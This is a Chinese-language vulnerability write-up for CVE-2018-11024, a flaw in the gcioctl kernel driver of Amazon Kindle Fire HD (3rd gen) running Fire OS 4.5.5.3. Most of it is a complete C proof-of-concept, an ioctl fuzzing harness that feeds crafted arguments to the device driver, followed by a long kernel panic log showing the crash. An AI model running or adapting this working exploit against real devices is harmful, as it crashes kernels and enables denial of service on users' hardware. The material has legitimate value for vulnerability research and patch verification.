(CVE-2018-11024)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞
一、漏洞简介
Amazon Kindle Fire HD(3rd)Fire OS 4.5.5.3的内核组件中的内核模块/omap/drivers/misc/gcx/gcioctl/gcif.c允许攻击者通过设备/ dev上ioctl的参数注入特制参数/ gcioctl使用命令1077435789并导致内核崩溃。
二、漏洞影响
Fire OS 4.5.5.3
三、复现过程
poc
#include<stdio.h>
#include<string.h> //strlen
#include<sys/socket.h>
#include<arpa/inet.h> //inet_addr
#include<unistd.h> //write
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <stdbool.h>
// Socket boilerplate code taken from here: http://www.binarytides.com/server-client-example-c-sockets-linux/
/*
seed, ioctl_id, num_mappings, num_blobs, dev_name_len, dev_name, map_entry_t_arr, blobs
*/
int debug = 1;
typedef struct {
int src_id;
int dst_id;
int offset;
} map_entry_t;
short tiny_vals[18] = {128, 127, 64, 63, 32, 31, 16, 15, 8, 7, 4, 3, 2, 1, 0, 256, 255, -1};
int *small_vals;
int num_small_vals;
// populates small_vals when called
void populate_arrs(int top) {
int num = 1;
int count = 0;
while (num < top) {
//printf("%d\n", num);
num <<= 1;
count += 2;
}
// top
count += 1;
// -1
count += 1;
num_small_vals = count;
num >>= 1;
small_vals = malloc(sizeof(int)*count);
memset(small_vals, 0, count);
int i = 0;
while(num > 1) {
small_vals[i] = num;
i++;
small_vals[i] = num-1;
i++;
num >>= 1;
}
small_vals[i] = 0;
small_vals[i+1] = top;
small_vals[i+2] = top-1;
small_vals[i+3] = -1;
}
// generate a random value of size size and store it in elem.
// value has a weight % chance to be a "small value"
void gen_rand_val(int size, char *elem, int small_weight) {
int i;
if ((rand() % 100) < small_weight) {
// do small thing
unsigned int idx = (rand() % num_small_vals);
printf("Choosing %d\n", small_vals[idx]);
switch (size) {
case 2:
idx = (rand() % 18);
*(short *)elem = tiny_vals[idx];
break;
case 4:
*(int *)elem = small_vals[idx];
break;
case 8:
*(long long*)elem = small_vals[idx];
break;
default:
printf("Damn bro. Size: %d\n", size);
exit(-1);
}
}
else {
for(i=0; i < size; i++) {
elem[i] = (char)(rand()%0x100);
}
}
}
int main(int argc , char *argv[])
{
int num_blobs = 0, num_mappings = 0, i = 0, dev_name_len = 0, j;
unsigned int ioctl_id = 0;
char *dev_name;
void *tmp;
char **ptr_arr;
int *len_arr;
unsigned int seed;
int sockfd , client_sock , c , read_size;
struct sockaddr_in server , client;
int msg_size;
void *generic_arr[264];
// max val for small_vals array
int top = 8192;
int cnt = 0;
// chance that our generics are filled with "small vals"
int default_weight = 50;
populate_arrs(top);
int retest = 1;
goto rerun;
sockfd = socket(AF_INET , SOCK_STREAM , 0);
if (sockfd == -1)
{
printf("Could not create socket");
}
puts("Socket created");
setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &(int){ 1 }, sizeof(int));
server.sin_family = AF_INET;
server.sin_addr.s_addr = INADDR_ANY;
server.sin_port = htons(atoi(argv[1]));
//Bind
if( bind(sockfd,(struct sockaddr *)&server , sizeof(server)) < 0)
{
//print the error message
perror("bind failed. Error");
return 1;
}
puts("bind done");
listen:
// Listen
listen(sockfd , 3);
puts("Waiting for incoming connections...");
c = sizeof(struct sockaddr_in);
// accept connection from an incoming client
client_sock = accept(sockfd, (struct sockaddr *)&client, (socklen_t*)&c);
if (client_sock < 0)
{
perror("accept failed");
return 1;
}
puts("Connection accepted");
msg_size = 0;
// Receive a message from client
while( (read_size = recv(client_sock , &msg_size , 4 , 0)) > 0 )
{
// recv the entire message
char *recv_buf = calloc(msg_size, sizeof(char));
if (recv_buf == NULL) {
printf("Failed to allocate recv_buf\n");
exit(-1);
}
int nrecvd = recv(client_sock, recv_buf, msg_size, 0);
if (nrecvd != msg_size) {
printf("Error getting all data!\n");
printf("nrecvd: %d\nmsg_size:%d\n", nrecvd, msg_size);
exit(-1);
}
// quickly save a copy of the most recent data
int savefd = open("/sdcard/saved", O_WRONLY|O_TRUNC|O_CREAT, 0644);
if (savefd < 0) {
perror("open saved");
exit(-1);
}
int err = write(savefd, recv_buf, msg_size);
if (err != msg_size) {
perror("write saved");
exit(-1);
}
fsync(savefd);
close(savefd);
rerun:
if (retest) {
recv_buf = calloc(msg_size, sizeof(char));
int fd = open("/sdcard/saved", O_RDONLY);
if (fd < 0) {
perror("open:");
exit(-1);
}
int fsize = lseek(fd, 0, SEEK_END);
printf("file size: %d\n", fsize);
lseek(fd, 0, SEEK_SET);
read(fd, recv_buf, fsize);
}
char *head = recv_buf;
seed = 0;
//seed, ioctl_id, num_mappings, num_blobs, dev_name_len, dev_name, map_entry_t_arr, blob_len_arr, blobs
memcpy(&seed, head, 4);
head += 4;
memcpy(&ioctl_id, head, 4);
head += 4;
memcpy(&num_mappings, head, 4);
head += 4;
memcpy(&num_blobs, head, 4);
head += 4;
memcpy(&dev_name_len, head, 4);
head += 4;
// srand with new seed
srand(seed);
/* dev name */
dev_name = calloc(dev_name_len+1, sizeof(char));
if (dev_name == NULL) {
printf("Failed to allocate dev_name\n");
exit(-1);
}
memcpy(dev_name, head, dev_name_len);
head += dev_name_len;
/* map */
map_entry_t *map = calloc(num_mappings, sizeof(map_entry_t));
if (map == NULL) {
printf("Failed to allocate map\n");
exit(-1);
}
if (num_mappings != 0) {
memcpy(map, head, num_mappings*sizeof(map_entry_t));
head += num_mappings*sizeof(map_entry_t);
}
/* blobs */
// first create an array to store the sizes themselves
len_arr = calloc(num_blobs, sizeof(int));
if (len_arr == NULL) {
printf("Failed to allocate len_arr\n");
exit(-1);
}
// we'll also want an array to store our pointers
ptr_arr = calloc(num_blobs, sizeof(void *));
if (ptr_arr == NULL) {
printf("Failed to allocate ptr_arr\n");
exit(-1);
}
// copy the blob sizes into our size_arr
for (j=0; j < num_blobs; j++) {
memcpy(&len_arr[j], head, sizeof(int));
head += sizeof(int);
}
// we'll also want memory bufs for all blobs
// now that we have the sizes, allocate all the buffers we need
for (j=0; j < num_blobs; j++) {
ptr_arr[j] = calloc(len_arr[j], sizeof(char));
printf("Sizeof(ptr_arr[%d])=%d\n", j, len_arr[j]);
printf("ptr_arr[%d]=%p\n", j, ptr_arr[j]);
//printf("just added %p to ptr_arr\n", ptr_arr[j]);
if (ptr_arr[j] == NULL) {
printf("Failed to allocate a blob store\n");
exit(-1);
}
// might as well copy the memory over as soon as we allocate the space
memcpy((char *)ptr_arr[j], head, len_arr[j]);
printf("ptr_arr[%d]=\n", j);
for(i=0;i<len_arr[j];i+=4){
printf("0x%08x\n", *(unsigned int *)(ptr_arr[j] + i));
}
printf("\n");
head += len_arr[j];
}
int num_generics = 0;
// time for pointer fixup
for (i=0; i < num_mappings; i++) {
// get out entry
map_entry_t entry = map[i];
// pull out the struct to be fixed up
char *tmp = ptr_arr[entry.src_id];
// check if this is a struct ptr or just a generic one
// just a generic one
if (entry.dst_id < 0) {
// 90% chance we fixup the generic
if ( (rand() % 10) > 0) {
int buf_len = 128;
char *tmp_generic = malloc(buf_len);
memset(tmp_generic, 0, buf_len);
// 95% chance we fill it with data
if ((rand() % 100) > 95) {
// if dst_id is < 0, it's abs value is the element size
int size = -1 * entry.dst_id;
int weight;
// if it's a char or some float, never choose a "small val"
if (size == 1 || size > 8)
weight = 0;
else
weight = default_weight;
for (i=0; i < buf_len; i+=size) {
gen_rand_val(size, &tmp_generic[i], weight);
}
}
generic_arr[num_generics] = tmp_generic;
memcpy(tmp+entry.offset, &tmp_generic, sizeof(void *));
num_generics += 1;
if (num_generics >= 264) {
printf("Code a better solution for storing generics\n");
exit(1);
}
}
}
// a struct ptr, so we have the data
else {
// 1 in 400 chance we don't fixup
if ( (rand() % 400) > 0) {
// now point it to the correct struct/blob
// printf("placing %p, at %p\n", ptr_arr[entry.dst_id], tmp+entry.offset);
memcpy(tmp+entry.offset, &ptr_arr[entry.dst_id], sizeof(void *));
}
}
}
if (debug) {
printf("ioctl_id: %d\n", ioctl_id);
printf("num_mappings: %d\n", num_mappings);
printf("num_blobs: %d\n", num_blobs);
printf("dev_name_len: %d\n", dev_name_len);
printf("dev_name: %s\n", dev_name);
printf("data[]: \n");
//printf("(0x%x)\n", *(int *)&ptr_arr[0]);
printf("(0x%p) : ", &ptr_arr[0]);
printf("(0x%016lx)\n", *(unsigned long int *)ptr_arr[0]);
printf("(0x%p) : ", (&ptr_arr[0]+1*8));
printf("(0x%016lx)\n", *(unsigned long int *)(ptr_arr[0]+1*8));
printf("(0x%p) : ", (&ptr_arr[0]+2*8));
printf("(0x%016lx)\n", *(unsigned long int *)(ptr_arr[0]+2*8));
printf("(0x%p) : ", (&ptr_arr[0]+3*8));
printf("(0x%016lx)\n", *(unsigned long int *)(ptr_arr[0]+3*8));
printf("(0x%p) : ", (&ptr_arr[0]+4*8));
printf("(0x%016lx)\n", *(unsigned long int *)(ptr_arr[0]+4*8));
//printf("(0x%016lx)\n", *(unsigned long int *)(ptr_arr[0]+5*8));
//printf("(0x%016lx)\n", *(unsigned long int *)(ptr_arr[0]+6*8));
//printf("(0x%x)\n", (int *)ptr_arr, (int *)ptr_arr);
}
// time for the actual ioctl
//printf("Try to open device %s\n", dev_name);
//fflush(stdout);
int fd = open(dev_name, O_RDONLY);
if (fd < 0) {
perror("open");
exit(-1);
} else {
printf("Open devicd %s successfully.\n", dev_name);
}
//fflush(stdout);
//printf("Try to call ioctl(fd=%d, ioctl_id=%d, ptr_arr=%p)\n", fd, ioctl_id, ptr_arr[0]);
fflush(stdout);
printf("%10d:", cnt++);
if ((ioctl(fd, ioctl_id, ptr_arr[0])) == -1)
perror("ioctl");
else
printf("good hit\n");
close(fd);
printf("device %s closed\n", dev_name);
if (retest)
exit(0);
fflush(stdout);
// okay now free all the shit we alloced
free(recv_buf);
free(dev_name);
if (map != NULL)
free(map);
free(len_arr);
for (i=0; i < num_blobs; i++) {
//printf("%d: free'ing %p\n", i, ptr_arr[i]);
free(ptr_arr[i]);
}
free(ptr_arr);
for (i=0; i < num_generics; i++) {
free(generic_arr[i]);
}
write(client_sock, &msg_size, 4);
msg_size = 0;
}
if(read_size == 0)
{
puts("Client disconnected");
fflush(stdout);
close(client_sock);
goto listen;
}
else if(read_size == -1)
{
perror("recv failed");
}
return 0;
}
崩溃日志
[ 144.428375] Unable to handle kernel paging request at virtual address d900000c
[ 144.436462] pgd = dcac0000
[ 144.439697] [d900000c] *pgd=00000000
[ 144.443939] Internal error: Oops: 5 [#1] PREEMPT SMP ARM
[ 144.450012] Modules linked in: omaplfb(O) pvrsrvkm(O) pvr_logger(O)
[ 144.457672] CPU: 0 Tainted: G O (3.4.83-gd2afc0bae69 #1)
[ 144.465118] PC is at c2dm_l1cache+0x30/0x100
[ 144.469940] LR is at dev_ioctl+0x3f0/0x10c4
[ 144.474670] pc : [<c03187ac>] lr : [<c031782c>] psr: a0000013
[ 144.474670] sp : c2d6be38 ip : 00000000 fp : c2d6be6c
[ 144.487640] r10: 00000000 r9 : d8c0cca8 r8 : 00b8dd90
[ 144.493621] r7 : 00000000 r6 : c2d6bea4 r5 : 00b8dd90 r4 : 388b77c4
[ 144.500915] r3 : d9000004 r2 : 75e0c121 r1 : c2d6bea4 r0 : 00000000
[ 144.508331] Flags: NzCv IRQs on FIQs on Mode SVC_32 ISA ARM Segment user
[ 144.516418] Control: 10c5387d Table: 9cac004a DAC: 00000015
[ 144.522827]
[ 144.522857] PC: 0xc031872c:
[ 144.527954] 872c e51b2034 e592300c eaffffa5 e30c281c e34c209d e5923000 e3530000 1affffbd
[ 144.538482] 874c eaffffc0 e51b303c e51b1040 e2833001 e51b2034 e1530001 e50b303c e2822010
[ 144.549163] 876c e50b2034 1affff8c eaffff83 c09dc81c e1a0c00d e92ddff0 e24cb004 e24dd00c
[ 144.559844] 878c e3500000 e1a07002 e50b0030 da00000d e0814200 e1a06001 e1a03001 e3a02000
[ 144.570404] 87ac e5930008 e593c004 e2833010 e1530004 e022209c 1afffff9 e3520902 3a000003
[ 144.581085] 87cc e3570002 9a000022 e24bd028 e89daff0 e59f9090 e2818008 e3a0a000 e5963008
[ 144.591735] 87ec e5184008 e3530000 13a05000 1a00000a ea000010 e5181004 e5993024 e0841001
[ 144.602416] 880c e12fff33 e5962008 e2855001 e596300c e1550002 e0844003 2a000006 e2572000
[ 144.612976]
[ 144.612976] LR: 0xc03177ac:
[ 144.618072] 77ac ebf55c15 eaffff35 e3053d8d e3443038 e1510003 1affff30 e1a0200d e3c23d7f
[ 144.628631] 77cc e3c3303f e24b0064 e5933008 e2952038 30d22003 33a03000 e3530000 1a0001a8
[ 144.639160] 77ec e1a01005 e3a02038 ebfcfa90 e3500000 1a00000e e51b2030 e3520001 0a0001cb
[ 144.649780] 780c e3520002 0a0001ee e3520000 1a000007 e51b0064 e3a02000 e24b1060 eb0003d3
[ 144.660369] 782c e51b0064 e24b1060 e51b2030 eb000338 e3a05000 eaffff11 e24b1064 e50b1088
[ 144.670776] 784c e51b0088 e3a01010 ebfd03c1 e3a03004 e50b3064 e5963008 e2952004 30d22003
[ 144.681213] 786c 33a03000 e3530000 0a0001c5 e3e0500d eaffff02 e1a0200d e3c26d7f e3c6603f
[ 144.691528] 788c e5963008 e2952008 30d22003 33a03000 e3530000 1a000021 e24b3064 e1a01005
[ 144.701995]
[ 144.701995] SP: 0xc2d6bdb8:
[ 144.706878] bdb8 c2d6be24 00b8dd90 c2d6bdec c2d6bdd0 c00084d0 c03187ac a0000013 ffffffff
[ 144.717407] bdd8 c2d6be24 00b8dd90 c2d6be6c c2d6bdf0 c06a5318 c0008370 00000000 c2d6bea4
[ 144.727905] bdf8 75e0c121 d9000004 388b77c4 00b8dd90 c2d6bea4 00000000 00b8dd90 d8c0cca8
[ 144.738586] be18 00000000 c2d6be6c 00000000 c2d6be38 c031782c c03187ac a0000013 ffffffff
[ 144.749145] be38 c02ba53c 575b4b92 d8578000 00000000 00b8dd90 0000000b dcae46c0 00b8dd90
[ 144.759796] be58 d8c0cca8 00000000 c2d6bf04 c2d6be70 c031782c c0318788 00000001 00000088
[ 144.770355] be78 000ffeff 00000001 c2d6bedc c2d6be90 c0207454 c00bd920 00000027 d7ce5000
[ 144.781005] be98 c2d6bed4 c2d6bea8 575b4b92 4ccba3b5 47a0578f 83b275c7 00000000 00020261
[ 144.791687]
[ 144.791687] FP: 0xc2d6bdec:
[ 144.796661] bdec c0008370 00000000 c2d6bea4 75e0c121 d9000004 388b77c4 00b8dd90 c2d6bea4
[ 144.807189] be0c 00000000 00b8dd90 d8c0cca8 00000000 c2d6be6c 00000000 c2d6be38 c031782c
[ 144.817840] be2c c03187ac a0000013 ffffffff c02ba53c 575b4b92 d8578000 00000000 00b8dd90
[ 144.828399] be4c 0000000b dcae46c0 00b8dd90 d8c0cca8 00000000 c2d6bf04 c2d6be70 c031782c
[ 144.839080] be6c c0318788 00000001 00000088 000ffeff 00000001 c2d6bedc c2d6be90 c0207454
[ 144.849761] be8c c00bd920 00000027 d7ce5000 c2d6bed4 c2d6bea8 575b4b92 4ccba3b5 47a0578f
[ 144.860290] beac 83b275c7 00000000 00020261 00000000 00000000 00000000 00000000 00000000
[ 144.870971] becc 00000000 00000000 00000000 c02089fc 00000000 dcae46c0 0000000b dcae46c0
[ 144.881652]
[ 144.881652] R1: 0xc2d6be24:
[ 144.886627] be24 c2d6be38 c031782c c03187ac a0000013 ffffffff c02ba53c 575b4b92 d8578000
[ 144.897308] be44 00000000 00b8dd90 0000000b dcae46c0 00b8dd90 d8c0cca8 00000000 c2d6bf04
[ 144.907989] be64 c2d6be70 c031782c c0318788 00000001 00000088 000ffeff 00000001 c2d6bedc
[ 144.918518] be84 c2d6be90 c0207454 c00bd920 00000027 d7ce5000 c2d6bed4 c2d6bea8 575b4b92
[ 144.929199] bea4 4ccba3b5 47a0578f 83b275c7 00000000 00020261 00000000 00000000 00000000
[ 144.939849] bec4 00000000 00000000 00000000 00000000 00000000 c02089fc 00000000 dcae46c0
[ 144.950531] bee4 0000000b dcae46c0 00b8dd90 d8c0cca8 00000000 c2d6bf74 c2d6bf08 c0136044
[ 144.961059] bf04 c0317448 00000000 00000000 00000000 00000001 00000000 dd045190 dcf8c440
[ 144.971710]
[ 144.971710] R3: 0xd8ffff84:
[ 144.976623] ff84 d8ffff20 d8efb000 00000707 020e40fb d8efb075 d8ffff3c d8efb01c d8ffffa0
[ 144.987213] ffa4 d8ffffa0 d8efb028 ca9788f0 d8ffffb0 d8ffffb0 00000000 bf06e9c8 80000088
[ 144.997772] ffc4 dd2eac00 dd309540 00000000 00000000 00000000 00000000 00000000 00000000
[ 145.008392] ffe4 00000000 00000000 00000000 00000000 00000000 00000000 00000000 ********
[ 145.018798] 0004 ******** ******** ******** ******** ******** ******** ******** ********
[ 145.029327] 0024 ******** ******** ******** ******** ******** ******** ******** ********
[ 145.039886] 0044 ******** ******** ******** ******** ******** ******** ******** ********
[ 145.050384] 0064 ******** ******** ******** ******** ******** ******** ******** ********
[ 145.060913]
[ 145.060913] R6: 0xc2d6be24:
[ 145.066009] be24 c2d6be38 c031782c c03187ac a0000013 ffffffff c02ba53c 575b4b92 d8578000
[ 145.076568] be44 00000000 00b8dd90 0000000b dcae46c0 00b8dd90 d8c0cca8 00000000 c2d6bf04
[ 145.087219] be64 c2d6be70 c031782c c0318788 00000001 00000088 000ffeff 00000001 c2d6bedc
[ 145.097900] be84 c2d6be90 c0207454 c00bd920 00000027 d7ce5000 c2d6bed4 c2d6bea8 575b4b92
[ 145.108459] bea4 4ccba3b5 47a0578f 83b275c7 00000000 00020261 00000000 00000000 00000000
[ 145.118988] bec4 00000000 00000000 00000000 00000000 00000000 c02089fc 00000000 dcae46c0
[ 145.129638] bee4 0000000b dcae46c0 00b8dd90 d8c0cca8 00000000 c2d6bf74 c2d6bf08 c0136044
[ 145.140319] bf04 c0317448 00000000 00000000 00000000 00000001 00000000 dd045190 dcf8c440
[ 145.150848]
[ 145.150848] R9: 0xd8c0cc28:
[ 145.155944] cc28 d8c0cc28 d8c0cc28 00000000 00000000 00000000 c06bc674 000200da c09dda58
[ 145.166503] cc48 00000000 00000000 d8c0cc50 d8c0cc50 00000000 c0aa5174 c0aa5174 c0aa5148
[ 145.177062] cc68 5aefd94b 00000000 00000000 00000000 d8c0cc80 9ad1f453 00000000 00000000
[ 145.187713] cc88 00200000 00000000 00000000 d8c0cc94 d8c0cc94 dd3b56c0 dd3b56c0 00000000
[ 145.198394] cca8 000521a4 000003e8 000003e8 00000000 00000000 00000000 c06b9600 dd150400
[ 145.208923] ccc8 d8c0cd80 dd3e3e70 00001064 00000001 0fb00000 5aefd94b 2d2b4d13 5aefd94b
[ 145.219573] cce8 2d2b4d13 5aefd94b 2d2b4d13 00000000 00000000 00000000 00000000 00000000
[ 145.230255] cd08 00000000 00000000 00000000 00000000 00000001 00000000 00000000 d8c0cd24
[ 145.240936] Process executor32 (pid: 3810, stack limit = 0xc2d6a2f8)
[ 145.248016] Stack: (0xc2d6be38 to 0xc2d6c000)
[ 145.253082] be20: c02ba53c 575b4b92
[ 145.262176] be40: d8578000 00000000 00b8dd90 0000000b dcae46c0 00b8dd90 d8c0cca8 00000000
[ 145.271392] be60: c2d6bf04 c2d6be70 c031782c c0318788 00000001 00000088 000ffeff 00000001
[ 145.280609] be80: c2d6bedc c2d6be90 c0207454 c00bd920 00000027 d7ce5000 c2d6bed4 c2d6bea8
[ 145.289703] bea0: 575b4b92 4ccba3b5 47a0578f 83b275c7 00000000 00020261 00000000 00000000
[ 145.298919] bec0: 00000000 00000000 00000000 00000000 00000000 00000000 c02089fc 00000000
[ 145.308105] bee0: dcae46c0 0000000b dcae46c0 00b8dd90 d8c0cca8 00000000 c2d6bf74 c2d6bf08
[ 145.317352] bf00: c0136044 c0317448 00000000 00000000 00000000 00000001 00000000 dd045190
[ 145.326416] bf20: dcf8c440 c2d6bf0c c2d6a000 00b8dd80 00b8dd90 40385d8d dcae46c0 0000000b
[ 145.335662] bf40: c2d6a000 00000000 c2d6bf64 00000000 00b8dd90 40385d8d dcae46c0 0000000b
[ 145.344879] bf60: c2d6a000 00000000 c2d6bfa4 c2d6bf78 c01365e0 c0135fc4 00000000 00000000
[ 145.354095] bf80: c0013e08 00b8dd80 000121c0 00000000 00000036 c0013e08 00000000 c2d6bfa8
[ 145.363159] bfa0: c0013c60 c0136578 00b8dd80 000121c0 0000000b 40385d8d 00b8dd90 00b8dd90
[ 145.372406] bfc0: 00b8dd80 000121c0 00000000 00000036 00000000 00000000 00000000 bee035f4
[ 145.381622] bfe0: 810100fc bee030f4 00011578 0002b28c 60000010 0000000b 4d6969d9 03020430
[ 145.390686] Backtrace:
[ 145.393829] [<c031877c>] (c2dm_l1cache+0x0/0x100) from [<c031782c>] (dev_ioctl+0x3f0/0x10c4)
[ 145.403228] [<c031743c>] (dev_ioctl+0x0/0x10c4) from [<c0136044>] (do_vfs_ioctl+0x8c/0x5b4)
[ 145.412658] [<c0135fb8>] (do_vfs_ioctl+0x0/0x5b4) from [<c01365e0>] (sys_ioctl+0x74/0x84)
[ 145.421874] [<c013656c>] (sys_ioctl+0x0/0x84) from [<c0013c60>] (ret_fast_syscall+0x0/0x30)
[ 145.431304] r8:c0013e08 r7:00000036 r6:00000000 r5:000121c0 r4:00b8dd80
[ 145.439605] Code: e0814200 e1a06001 e1a03001 e3a02000 (e5930008)
[ 145.450225] Board Information:
[ 145.450225] Revision : 0001
[ 145.450256] Serial : 0000000000000000
[ 145.450256] SoC Information:
[ 145.450256] CPU : OMAP4470
[ 145.450286] Rev : ES1.0
[ 145.450286] Type : HS
[ 145.450286] Production ID: 0002B975-000000CC
[ 145.450286] Die ID : 1CC60000-50002FFF-0B00935D-11007004
[ 145.450317]
[ 145.485900] ---[ end trace 0fe3b4c74b4e9fa7 ]---
[ 145.491149] Kernel panic - not syncing: Fatal exception
[ 145.496917] CPU1: stopping
[ 145.500152] Backtrace:
[ 145.503204] [<c0018148>] (dump_backtrace+0x0/0x10c) from [<c0698bb8>] (dump_stack+0x18/0x1c)
[ 145.512695] r6:c09ddc50 r5:c09dc844 r4:00000001 r3:c0a0e950
[ 145.519714] [<c0698ba0>] (dump_stack+0x0/0x1c) from [<c0019bd8>] (handle_IPI+0x190/0x1c4)
[ 145.528961] [<c0019a48>] (handle_IPI+0x0/0x1c4) from [<c00084fc>] (gic_handle_irq+0x58/0x60)
[ 145.538482] [<c00084a4>] (gic_handle_irq+0x0/0x60) from [<c06a5540>] (__irq_usr+0x40/0x60)
[ 145.547637] Exception stack(0xd85a5fb0 to 0xd85a5ff8)
[ 145.553466] 5fa0: 41822290 418185e8 00000001 41c95000
[ 145.562561] 5fc0: 418185e8 41687460 4010d0ec 418185e8 4010d038 41689398 7fffffff 401602ec
[ 145.571777] 5fe0: 418191e8 5ba34d10 41609aa8 41609974 200b0010 ffffffff
[ 145.579284] r6:ffffffff r5:200b0010 r4:41609974 r3:41822290
[ 145.586364] CPU0 PC (0) : 0xc003ee38
[ 145.590576] CPU0 PC (1) : 0xc003ee54
[ 145.594635] CPU0 PC (2) : 0xc003ee54
[ 145.598693] CPU0 PC (3) : 0xc003ee54
[ 145.602722] CPU0 PC (4) : 0xc003ee54
[ 145.606781] CPU0 PC (5) : 0xc003ee54
[ 145.610839] CPU0 PC (6) : 0xc003ee54
[ 145.614898] CPU0 PC (7) : 0xc003ee54
[ 145.619110] CPU0 PC (8) : 0xc003ee54
[ 145.623168] CPU0 PC (9) : 0xc003ee54
[ 145.627227] CPU1 PC (0) : 0xc0019b2c
[ 145.631408] CPU1 PC (1) : 0xc0019b2c
[ 145.635467] CPU1 PC (2) : 0xc0019b2c
[ 145.639495] CPU1 PC (3) : 0xc0019b2c
[ 145.643707] CPU1 PC (4) : 0xc0019b2c
[ 145.647766] CPU1 PC (5) : 0xc0019b2c
[ 145.651824] CPU1 PC (6) : 0xc0019b2c
[ 145.656005] CPU1 PC (7) : 0xc0019b2c
[ 145.660064] CPU1 PC (8) : 0xc0019b2c
[ 145.664123] CPU1 PC (9) : 0xc0019b2c
[ 145.668182]
[ 145.669952] Restarting Linux version 3.4.83-gd2afc0bae69 (build@14-use1a-b-39) (gcc version 4.7 (GCC) ) #1 SMP PREEMPT Tue Sep 19 22:04:47 UTC 2017
[ 145.669982]